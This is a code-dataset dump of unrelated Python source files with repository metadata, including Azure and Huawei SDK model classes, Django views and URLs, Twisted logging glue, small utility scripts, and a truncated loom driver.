# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayFrontendIPConfiguration(SubResource):
"""Frontend IP configuration of an application gateway.
:param id: Resource ID.
:type id: str
:param private_ip_address: PrivateIPAddress of the network interface IP
Configuration.
:type private_ip_address: str
:param private_ip_allocation_method: PrivateIP allocation method. Possible
values include: 'Static', 'Dynamic'
:type private_ip_allocation_method: str or
~azure.mgmt.network.v2017_10_01.models.IPAllocationMethod
:param subnet: Reference of the subnet resource.
:type subnet: ~azure.mgmt.network.v2017_10_01.models.SubResource
:param public_ip_address: Reference of the PublicIP resource.
:type public_ip_address:
~azure.mgmt.network.v2017_10_01.models.SubResource
:param provisioning_state: Provisioning state of the public IP resource.
Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'SubResource'},
'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'SubResource'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, private_ip_address=None, private_ip_allocation_method=None, subnet=None, public_ip_address=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayFrontendIPConfiguration, self).__init__(id=id)
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.public_ip_address = public_ip_address
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| [
"laurent.mazuel@gmail.com"
] | laurent.mazuel@gmail.com |
3cf9d17ecba3aa57d48ecb8dfdd99b8f2850da18 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03407/s848933325.py | ff4cec19ca5069927aff3e41f680aa80c10562e8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def solve(string):
a, b, c = map(int, string.split())
return "Yes" if a + b - c >= 0 else "No"
if __name__ == '__main__':
print(solve(input()))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
02b153c3d0fc5f6666834084cdbd1206b6fec8e0 | 5ff73a257eed74de87c0279c69552c19420fcc7d | /venv/bin/restauth-service.py | 1c22855c0d3bbf3289c293172bb8dd3aa5f859d9 | [] | no_license | GanapathiAmbore/api_auth_pro | 9109f4fbd50ae0225875daa3f82418b7c9aa5381 | d98e3cf1cade4c9b461fe298f94bdc38625c06aa | refs/heads/master | 2022-06-13T08:31:49.728775 | 2019-07-16T05:16:37 | 2019-07-16T05:16:37 | 196,578,277 | 0 | 0 | null | 2022-04-22T21:55:26 | 2019-07-12T12:47:44 | Python | UTF-8 | Python | false | false | 3,830 | py | #!/home/ganapathi/PycharmProjects/authpro/venv/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of RestAuth (https://restauth.net).
#
# RestAuth is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# RestAuth is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with RestAuth. If not,
# see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from pkg_resources import DistributionNotFound
from pkg_resources import Requirement
from pkg_resources import resource_filename
# Setup environment
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'RestAuth.settings')
sys.path.append(os.getcwd())
try:
req = Requirement.parse("RestAuth")
path = resource_filename(req, 'RestAuth')
if os.path.exists(path): # pragma: no cover
sys.path.insert(0, path)
except DistributionNotFound:
pass # we're run in a not-installed environment
try:
from django.core.exceptions import ValidationError
from django.db import transaction
from django.db.utils import IntegrityError
from Services.models import Service
from Services.cli.parsers import parser
except ImportError as e: # pragma: no cover
sys.stderr.write(
'Error: Cannot import RestAuth. Please make sure RestAuth is in your PYTHONPATH.\n')
sys.exit(1)
def main(args=None):
args = parser.parse_args(args=args)
if args.action == 'add':
password = args.get_password(args)
if args.password_generated:
print(args.pwd)
args.service.set_password(password)
args.service.save()
elif args.action == 'rename':
args.service.username = args.name
with transaction.atomic():
try:
args.service.save()
except IntegrityError:
parser.error("%s: Service already exists." % args.name)
elif args.action == 'rm':
args.service.delete()
elif args.action == 'ls':
for service in Service.objects.all().order_by('username'):
print('%s: %s' % (service.name, ', '.join(service.addresses)))
elif args.action == 'view':
print('Last used: %s' % (args.service.last_login))
print('Hosts: %s' % (', '.join(args.service.addresses)))
print('Permissions: %s' % (', '.join(args.service.permissions)))
elif args.action == 'set-hosts':
try:
args.service.set_hosts(*args.hosts)
except ValidationError as e:
parser.error(e.messages[0])
elif args.action == 'add-hosts':
try:
args.service.add_hosts(*args.hosts)
except ValidationError as e:
parser.error(e.messages[0])
elif args.action == 'rm-hosts':
args.service.del_hosts(*args.hosts)
elif args.action == 'set-password':
password = args.get_password(args)
if args.password_generated:
print(args.pwd)
args.service.set_password(password)
args.service.save()
elif args.action == 'set-permissions':
args.service.user_permissions.clear()
args.service.user_permissions.add(*args.permissions)
elif args.action == 'add-permissions':
args.service.user_permissions.add(*args.permissions)
elif args.action == 'rm-permissions': # pragma: no branch
args.service.user_permissions.remove(*args.permissions)
if __name__ == '__main__': # pragma: no cover
main()
| [
"ganapathiambore@gmail.com"
] | ganapathiambore@gmail.com |
01afe9e24bd9eb31dadd305dec3fa3f60ba98f28 | 1d23c51bd24fc168df14fa10b30180bd928d1ea4 | /Lib/site-packages/twisted/logger/_legacy.py | c03f93b687532317a997175c0116dd9231be8e8f | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | BeaverInc/covid19CityMontreal | 62dac14840dadcdf20985663bc2527c90bab926c | 1b283589f6885977a179effce20212a9311a2ac0 | refs/heads/master | 2021-05-22T20:01:22.443897 | 2020-06-21T08:00:57 | 2020-06-21T08:00:57 | 253,067,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,237 | py | # -*- test-case-name: twisted.logger.test.test_legacy -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Integration with L{twisted.python.log}.
"""
from zope.interface import implementer
from ._levels import LogLevel
from ._format import formatEvent
from ._observer import ILogObserver
from ._stdlib import fromStdlibLogLevelMapping, StringifiableFromEvent
@implementer(ILogObserver)
class LegacyLogObserverWrapper(object):
"""
L{ILogObserver} that wraps an L{twisted.python.log.ILogObserver}.
Received (new-style) events are modified prior to forwarding to
the legacy observer to ensure compatibility with observers that
expect legacy events.
"""
def __init__(self, legacyObserver):
"""
@param legacyObserver: a legacy observer to which this observer will
forward events.
@type legacyObserver: L{twisted.python.log.ILogObserver}
"""
self.legacyObserver = legacyObserver
def __repr__(self):
return (
"{self.__class__.__name__}({self.legacyObserver})"
.format(self=self)
)
def __call__(self, event):
"""
Forward events to the legacy observer after editing them to
ensure compatibility.
@param event: an event
@type event: L{dict}
"""
# The "message" key is required by textFromEventDict()
if "message" not in event:
event["message"] = ()
if "time" not in event:
event["time"] = event["log_time"]
if "system" not in event:
event["system"] = event.get("log_system", "-")
# Format new style -> old style
if "format" not in event and event.get("log_format", None) is not None:
# Create an object that implements __str__() in order to defer the
# work of formatting until it's needed by a legacy log observer.
event["format"] = "%(log_legacy)s"
event["log_legacy"] = StringifiableFromEvent(event.copy())
# In the old-style system, the 'message' key always holds a tuple
# of messages. If we find the 'message' key here to not be a
# tuple, it has been passed as new-style parameter. We drop it
# here because we render it using the old-style 'format' key,
# which otherwise doesn't get precedence, and the original event
# has been copied above.
if not isinstance(event["message"], tuple):
event["message"] = ()
# From log.failure() -> isError blah blah
if "log_failure" in event:
if "failure" not in event:
event["failure"] = event["log_failure"]
if "isError" not in event:
event["isError"] = 1
if "why" not in event:
event["why"] = formatEvent(event)
elif "isError" not in event:
if event["log_level"] in (LogLevel.error, LogLevel.critical):
event["isError"] = 1
else:
event["isError"] = 0
self.legacyObserver(event)
def publishToNewObserver(observer, eventDict, textFromEventDict):
"""
Publish an old-style (L{twisted.python.log}) event to a new-style
(L{twisted.logger}) observer.
@note: It's possible that a new-style event was sent to a
L{LegacyLogObserverWrapper}, and may now be getting sent back to a
new-style observer. In this case, it's already a new-style event,
adapted to also look like an old-style event, and we don't need to
tweak it again to be a new-style event, hence the checks for
already-defined new-style keys.
@param observer: A new-style observer to handle this event.
@type observer: L{ILogObserver}
@param eventDict: An L{old-style <twisted.python.log>}, log event.
@type eventDict: L{dict}
@param textFromEventDict: callable that can format an old-style event as a
string. Passed here rather than imported to avoid circular dependency.
@type textFromEventDict: 1-arg L{callable} taking L{dict} returning L{str}
@return: L{None}
"""
if "log_time" not in eventDict:
eventDict["log_time"] = eventDict["time"]
if "log_format" not in eventDict:
text = textFromEventDict(eventDict)
if text is not None:
eventDict["log_text"] = text
eventDict["log_format"] = u"{log_text}"
if "log_level" not in eventDict:
if "logLevel" in eventDict:
try:
level = fromStdlibLogLevelMapping[eventDict["logLevel"]]
except KeyError:
level = None
elif "isError" in eventDict:
if eventDict["isError"]:
level = LogLevel.critical
else:
level = LogLevel.info
else:
level = LogLevel.info
if level is not None:
eventDict["log_level"] = level
if "log_namespace" not in eventDict:
eventDict["log_namespace"] = u"log_legacy"
if "log_system" not in eventDict and "system" in eventDict:
eventDict["log_system"] = eventDict["system"]
observer(eventDict)
| [
"36340780+lanyutian88@users.noreply.github.com"
] | 36340780+lanyutian88@users.noreply.github.com |
ec426d669943b3d906bdcdccc8e76b6d1897ad9b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/a_3.py | e0a7ff1e0dc59d9650eba21bd241d7f4111cf12e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'a_3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
e3bc0a518cc3efc7e7c027f9b002fdbccbd0ed8f | 67a0618de2844f175e74684214d45d1ba4b78554 | /core/views.py | 1e20ab3fe39e835fec71321975a7adf4527011eb | [
"MIT"
] | permissive | fantasiforbundet/grenselandet | c748fa0701d5c96351da916678f771e3717dea10 | d0a8878fa2aa1ee65737702d86ef25482bf46bff | refs/heads/master | 2020-11-26T20:56:00.828700 | 2015-02-06T16:45:16 | 2015-02-06T16:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | # -*- coding: utf-8 -*-
""" Generic views for webpage """
from django.views.generic.base import TemplateView
from django.conf import settings
class TextTemplateView(TemplateView):
""" Render plain text file. """
def render_to_response(self, context, **response_kwargs):
response_kwargs['content_type'] = 'text/plain'
return super(TemplateView, self).render_to_response(context, **response_kwargs)
class HumansTxtView(TextTemplateView):
""" humans.txt contains information about who made the site. """
template_name = 'humans.txt'
class RobotsTxtView(TextTemplateView):
""" robots.txt contains instructions for webcrawler bots. """
if settings.DEBUG:
template_name = 'robots-debug.txt'
else:
template_name = 'robots.txt'
| [
"haakenlid@gmail.com"
] | haakenlid@gmail.com |
05d8f7afde2beb0ee1fa60b24698bbaec6bff6ee | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_072/ch37_2019_10_01_17_50_41_334636.py | d8c0718ce3db7304a4911b49043117ba88bc9165 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | def eh_primo(numero):
i=3
if numero==0 or numero==1:
return False
if numero==2:
return True
if numero%2==0:
return False
while numero>i:
if numero%i==0:
return False
i+=2
return True
def lista_primos(z):
i=1
lista=[]
while len(lista)<z:
if eh_primo(i)==True:
lista.append(i)
i+=1
return lista
| [
"you@example.com"
] | you@example.com |
dc9bfe97a28ba15b3cac30f50bd63591f69f984a | 70b0d4b4440a97b648a08de0d89cc536e8f4c569 | /programmersaddsum.py | c1984961c684f7f8ddcf59b1e5cede34e7782682 | [] | no_license | seoseokbeom/leetcode | 01c9ca8a23e38a3d3c91d2de26f0b2a3a1710487 | 9d68de2271c2d5666750c8060407b56abbf6f45d | refs/heads/master | 2023-03-27T20:20:24.790750 | 2021-03-25T04:43:50 | 2021-03-25T04:43:50 | 273,779,517 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | import itertools
def solution(numbers):
arriter = itertools.combinations(numbers, 2)
res = set()
for v in arriter:
res.add(sum(v))
return sorted(list(res))
print(solution([5, 0, 2, 7]))
| [
"pronunciatio@naver.com"
] | pronunciatio@naver.com |
40cfca4342379984f26a53b5676ab401bdc45adf | 67bafcfbd2caa774eb3765e6b2e28b7accbf1307 | /API/run.py | 59ff19dc4a977469c88d18edb48c65459cb43d58 | [] | no_license | andy6804tw/digit-recognizer-project | 9b8f1a226001665019bb15845db24138615ac81d | 523920662cb853de0a08639ddfd449f0984a4d8e | refs/heads/master | 2021-07-06T21:20:26.633250 | 2020-03-03T10:38:06 | 2020-03-03T10:38:06 | 230,412,581 | 3 | 0 | null | 2021-05-06T19:49:15 | 2019-12-27T09:19:50 | HTML | UTF-8 | Python | false | false | 215 | py | from app import app
import config
@app.route('/')
def index():
return 'server started on '+str(config.PORT)+' PORT '+str(config.ENV)
if __name__ == '__main__':
print(app.url_map)
app.run(port=config.PORT)
| [
"andy6804tw@yahoo.com.tw"
] | andy6804tw@yahoo.com.tw |
92becf83a6decd3886bcd0a4bd1e591fe2d98fbe | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/opscenter-5.1.0/lib/py-redhat/2.6/shared/i386/twisted/internet/wxreactor.py | 380f36a8bb080347bd6b30d068fc1ee3263eac32 | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | ../../../../../../py-unpure/twisted/internet/wxreactor.py | [
"tushar239@gmail.com"
] | tushar239@gmail.com |
39e70a4daa73f14bc0fd321efc59599fa0359c32 | 7f9d4bce21b6d03ff7976c1462556db593abc2b2 | /python3/0392.py | 1756a1bf9cf8384ec1d78b45e95931f24318efe2 | [] | no_license | crazykuma/leetcode | 116343080f3869a5395fb60a46ac0556d170fa15 | cc186fddf09592607bd18d333a99980703ac1ab3 | refs/heads/master | 2020-09-11T12:27:21.863546 | 2020-05-20T05:43:07 | 2020-05-20T05:43:07 | 222,064,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if not s:
# s为空时是任何字符串的子集
return True
if len(set(s)-set(t)) > 0:
# s与t的差异不为空时,s不是任何t的子集
return False
i, j = 0, 0
m, n = len(s), len(t)
cur = ''
while i < m and j < n:
# 判断字符串t的值是否是下一个字符串s的值
if t[j] != s[i]:
j += 1
else:
cur += t[j]
if s == cur:
return True
i += 1
j += 1
return False
if __name__ == "__main__":
s = Solution()
assert s.isSubsequence("", "ahbgdc") == True
assert s.isSubsequence("abc", "ahbgdc") == True
assert s.isSubsequence("axc", "ahbgdc") == False
| [
"crazykuma@qq.com"
] | crazykuma@qq.com |
9a65e431490dc31d401ad844749544f12fa401fd | 407aa951fe64227c685eccd698b59959f2093dfc | /featureTests/1_DATA_ANALYSIS/0_delete_samples.py | 9b69d80728a4e044a45de5998d59a1fdae37bd30 | [] | no_license | sycophant-stone/tf_base | 32ad6798b2fcd728d959070a8eaf81649c9e247f | f6b4cb26fbc294e2a24dfa5d2ce05b9b33d77d41 | refs/heads/master | 2023-04-03T21:09:57.893549 | 2019-09-30T07:09:56 | 2019-09-30T07:09:56 | 138,027,678 | 4 | 0 | null | 2023-03-24T21:55:38 | 2018-06-20T12:06:55 | Jupyter Notebook | UTF-8 | Python | false | false | 516 | py | import os
def select_intrest_pics(pic_path):
n_img = len(os.listdir(pic_path))
print(n_img)
#assert n_img == 9963, 'VOC2007 should be 9963 samples'
for i in xrange(n_img):
if i< 10:
continue
del_path = os.path.join(pic_path, '{:06d}.jpg'.format(i))
print('i:%d, num_img:%d, del_path:%s'%(i, n_img, del_path))
if os.path.exists(del_path):
os.system('rm %s'%(del_path))
if __name__ == '__main__' :
select_intrest_pics('VOC2007/JPEGImages/')
| [
"kawayi_rendroid@163.com"
] | kawayi_rendroid@163.com |
58201c9362a881f83503ddc545f74aa836b8e231 | 8c568d5ba0c4f05b10ac831d4961f34925d3db8e | /02_分支/venv/Scripts/easy_install-script.py | ce0265f2898a47f1d54b0ddbe00ba3315c9c54fa | [] | no_license | Yang-yc/Python | dbca12bf10f7eb628ab2676e56ea5dc8ebe025af | 985bafccb45232e3c2e24d14f5a1e0dd1ff67065 | refs/heads/master | 2022-12-31T00:47:01.659889 | 2020-09-27T07:11:32 | 2020-09-27T07:11:32 | 285,573,920 | 0 | 0 | null | null | null | null | WINDOWS-1252 | Python | false | false | 445 | py | #!D:\PyCharmÏîÄ¿\02_·ÖÖ§\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"ycc20121404@163.com"
] | ycc20121404@163.com |
9fb1d258d6a429a7dae5f4bb3c23b7102eefcec3 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-bss/huaweicloudsdkbss/v2/model/demand_product_rating_result.py | ede1c62619bc6e73fd02a2dcb025007886597aa1 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 10,009 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DemandProductRatingResult:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'id': 'str',
'product_id': 'str',
'amount': 'decimal.Decimal',
'discount_amount': 'decimal.Decimal',
'official_website_amount': 'decimal.Decimal',
'measure_id': 'int',
'discount_rating_results': 'list[DemandDiscountRatingResult]'
}
attribute_map = {
'id': 'id',
'product_id': 'product_id',
'amount': 'amount',
'discount_amount': 'discount_amount',
'official_website_amount': 'official_website_amount',
'measure_id': 'measure_id',
'discount_rating_results': 'discount_rating_results'
}
def __init__(self, id=None, product_id=None, amount=None, discount_amount=None, official_website_amount=None, measure_id=None, discount_rating_results=None):
"""DemandProductRatingResult
The model defined in huaweicloud sdk
:param id: 同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:type id: str
:param product_id: 按需产品的ID。
:type product_id: str
:param amount: 折扣的金额。
:type amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param discount_amount: 优惠额(官网价和总价的差)。
:type discount_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param official_website_amount: 按需产品的官网价。
:type official_website_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param measure_id: 度量单位标识。 1:元
:type measure_id: int
:param discount_rating_results: 折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:type discount_rating_results: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
self._id = None
self._product_id = None
self._amount = None
self._discount_amount = None
self._official_website_amount = None
self._measure_id = None
self._discount_rating_results = None
self.discriminator = None
if id is not None:
self.id = id
if product_id is not None:
self.product_id = product_id
if amount is not None:
self.amount = amount
if discount_amount is not None:
self.discount_amount = discount_amount
if official_website_amount is not None:
self.official_website_amount = official_website_amount
if measure_id is not None:
self.measure_id = measure_id
if discount_rating_results is not None:
self.discount_rating_results = discount_rating_results
@property
def id(self):
"""Gets the id of this DemandProductRatingResult.
同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:return: The id of this DemandProductRatingResult.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DemandProductRatingResult.
同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:param id: The id of this DemandProductRatingResult.
:type id: str
"""
self._id = id
@property
def product_id(self):
"""Gets the product_id of this DemandProductRatingResult.
按需产品的ID。
:return: The product_id of this DemandProductRatingResult.
:rtype: str
"""
return self._product_id
@product_id.setter
def product_id(self, product_id):
"""Sets the product_id of this DemandProductRatingResult.
按需产品的ID。
:param product_id: The product_id of this DemandProductRatingResult.
:type product_id: str
"""
self._product_id = product_id
@property
def amount(self):
"""Gets the amount of this DemandProductRatingResult.
折扣的金额。
:return: The amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this DemandProductRatingResult.
折扣的金额。
:param amount: The amount of this DemandProductRatingResult.
:type amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._amount = amount
@property
def discount_amount(self):
"""Gets the discount_amount of this DemandProductRatingResult.
优惠额(官网价和总价的差)。
:return: The discount_amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._discount_amount
@discount_amount.setter
def discount_amount(self, discount_amount):
"""Sets the discount_amount of this DemandProductRatingResult.
优惠额(官网价和总价的差)。
:param discount_amount: The discount_amount of this DemandProductRatingResult.
:type discount_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._discount_amount = discount_amount
@property
def official_website_amount(self):
"""Gets the official_website_amount of this DemandProductRatingResult.
按需产品的官网价。
:return: The official_website_amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._official_website_amount
@official_website_amount.setter
def official_website_amount(self, official_website_amount):
"""Sets the official_website_amount of this DemandProductRatingResult.
按需产品的官网价。
:param official_website_amount: The official_website_amount of this DemandProductRatingResult.
:type official_website_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._official_website_amount = official_website_amount
@property
def measure_id(self):
"""Gets the measure_id of this DemandProductRatingResult.
度量单位标识。 1:元
:return: The measure_id of this DemandProductRatingResult.
:rtype: int
"""
return self._measure_id
@measure_id.setter
def measure_id(self, measure_id):
"""Sets the measure_id of this DemandProductRatingResult.
度量单位标识。 1:元
:param measure_id: The measure_id of this DemandProductRatingResult.
:type measure_id: int
"""
self._measure_id = measure_id
@property
def discount_rating_results(self):
"""Gets the discount_rating_results of this DemandProductRatingResult.
折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:return: The discount_rating_results of this DemandProductRatingResult.
:rtype: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
return self._discount_rating_results
@discount_rating_results.setter
def discount_rating_results(self, discount_rating_results):
"""Sets the discount_rating_results of this DemandProductRatingResult.
折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:param discount_rating_results: The discount_rating_results of this DemandProductRatingResult.
:type discount_rating_results: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
self._discount_rating_results = discount_rating_results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DemandProductRatingResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
a2fb9b7cc2174067b3dd28bb67f67ab7ad054100 | 0627aa3a4b1349eccc56eb7315bd9e99bbf6d84b | /otus_stackoverflow/questions/urls.py | 81d04bee9a183168f45298518d81bc7e558c1b85 | [] | no_license | vsokoltsov/OTUS_PYTHON | 93bc0efd8011bf47bb838d241e56703e6d9278f7 | feac92294756385fe5021bfa838d27b9334d6b7b | refs/heads/master | 2022-12-11T04:28:12.450518 | 2019-03-23T15:39:39 | 2019-03-23T15:39:39 | 177,306,191 | 0 | 0 | null | 2022-12-08T02:30:43 | 2019-03-23T15:31:22 | Python | UTF-8 | Python | false | false | 1,537 | py | from django.conf.urls import url
from django.contrib.auth.decorators import login_required
from rest_framework.routers import DefaultRouter
from django.conf.urls import include
from .views import (
QuestionsView, QuestionCreateView, QuestionDetailView,
TagsListView, AnswerCreateView, VoteAnswerView, VoteQuestionView,
SearchView
)
from .api.v1 import QuestionViewSet
router = DefaultRouter()
router.register(
'v1/questions', QuestionViewSet,
base_name='api_v1_questions'
)
urlpatterns = [
url(r'^$', QuestionsView.as_view(), name='root_path'),
url(
r'^questions$', QuestionsView.as_view(), name='questions_list'
),
url(
r'^questions/new$', QuestionCreateView.as_view(), name='new_question'
),
url(
r'^questions/search$', SearchView.as_view(), name="questions_search"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)$',
QuestionDetailView.as_view(), name='question_detail'
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/answers$',
AnswerCreateView.as_view(), name="new_answer"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/vote$',
VoteQuestionView.as_view(), name="vote_question"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/answers/' +
r'(?P<answer_id>[A-Za-z0-9]*)/vote$',
VoteAnswerView.as_view(), name="vote_answer"
),
url(
r'^tags$', TagsListView.as_view(), name='tags_list'
),
url(r'api', include(router.urls)),
]
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
5adf8dc1a5f8953fc511c63cb60f5482a01c4c9f | 9d40cb0b457b2c8c787af7185af664b20df6845e | /tabletloom/driver-fabric.py | 9b064e9906999345e650bb7fd8b848d830ca79f5 | [] | no_license | fo-am/patternmatrix2 | f13365618179867a3e27efecf946ec8f5dea190d | 3ec85b334f7da256b96265e29482641f38002f95 | refs/heads/master | 2023-04-12T06:46:15.469411 | 2022-02-22T13:53:16 | 2022-02-22T13:53:16 | 92,929,344 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,146 | py | import smbus
import time
import mcp23017
import tangible
import osc
bus = smbus.SMBus(1)
mcp = [0x20,0x21,0x22,0x23]
# sensor orientation
dn = 0
up = 1
lr = 2
rl = 3
layout = [[0x20,0,dn], [0x20,1,dn], [0x20,2,dn], [0x20,3,dn],
[0x21,0,dn], [0x21,1,dn], [0x21,2,dn], [0x21,3,dn],
[0x22,0,dn], [0x22,1,dn], [0x22,2,dn], [0x22,3,dn],
[0x23,0,dn], [0x23,1,dn], [0x23,2,dn], [0x23,3,dn]]
tokens = {"circle": [[0,0,0,0],[1,1,1,1]],
